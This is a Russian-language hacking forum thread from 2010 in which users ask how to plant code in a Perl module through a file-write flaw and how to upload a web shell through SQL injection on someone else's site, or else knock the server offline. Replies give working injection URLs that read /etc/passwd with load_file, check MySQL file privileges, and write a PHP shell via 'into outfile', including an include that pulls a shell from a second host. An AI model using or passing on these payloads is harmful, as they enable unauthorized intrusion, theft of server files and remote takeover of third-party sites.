ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.06.2010, 10:04
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Народ помогите советом.
Есть уязвимый пёрл скрипт при помощи которого я могу писать в файлы, как мне запихать грёбаную функцию в pm файл который подгружается в других пёрл скриптах , что бы можно было выполнить команду. Сразу говорю писать в сами скрипты незя, слетают права на запуск =(
|
|
|
10.06.2010, 11:44
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Я конечно совсем в перле не силен, но если в данной задаче целью является вэб-сервер, то кто мешает записать,например, пхп-шелл, насколько я знаю пхп-скриптам для работы не нужны права на исполнение. Хотя я могу ошибаться.
|
|
|
|
10.06.2010, 12:35
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Да шелл есть, Safe mod там.
|
|
|
|
10.06.2010, 13:23
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Ну как вариант можно и php.ini или httpd.conf переписать если права перлу позволяют и отключить сейфмод.
Или в саппорт хостинга написать чтобы отключили  или поставили права на исполнение твоего перлового скрипта.
Последний раз редактировалось Train; 10.06.2010 в 13:26..
|
|
|
|
10.06.2010, 15:54
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
|
|
|
|
10.06.2010, 16:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от ~d0s~
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
тебе что нужно? задосить сервер или залить шелл?
|
|
|
|
10.06.2010, 16:06
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Сообщение от Konqi
~dos~ тебе что нужно? задосить сервер или залить шелл?
Первое предпочтительнее 
|
|
|
|
10.06.2010, 16:07
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
1). сперва проверь magic_quotes_gpc (условие mq=off должен быть, ну если ты чайник, для особо одаренных есть обход https://forum.antichat.ru/showpost.php?p=663815&postcount=39)
2). потом проверь права на чтение/запись файлов
http://test/news.php?id=1+union+select+1,load_file('/etc/passwd'),2,3--
или так
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
выдаст root@localhost, пишешь без всяких локалхостов.
3). если все данные пункты выполнились на ура, идем дальше.
http://test/news.php?id=1+union+select+1,'код_шелла',2 ,3+into+outfile+'полный_путь_серве а'--
или если не хочешь заморачиваться (обз. условие allow_url_include=on)
http://test/news.php?id=1+union+select+1,'<?php @include("http://test2/shell.txt"); ?> ',2,3+into+outfile+'полный_путь_серв ера'--
Последний раз редактировалось pinch; 10.06.2010 в 16:13..
|
|
|
|
10.06.2010, 16:13
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от ~d0s~
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
Сначала попробуй залить шелл на взломанный тобой поддомен через найденную тобой скуль. Для этого нужно 3 условия:
1) file_priv - On
2) директория на запись
3) magic_quotes = Off
Как у тебя с правами (file_priv) ?
pinch опередил
|
|
|
|
10.06.2010, 16:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pinch
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
с чего ты взял что сервер работает под root-ом ? ))
$user=select+user()+from+mysql.user
select+file_priv+from+mysql.user+where+user=$user (hex/char)
|
|
|
|
|
|
|
|
Здесь присутствуют: 12 (пользователей: 0 , гостей: 12)
|
|
|
|
Похожие темы
Линейный вид
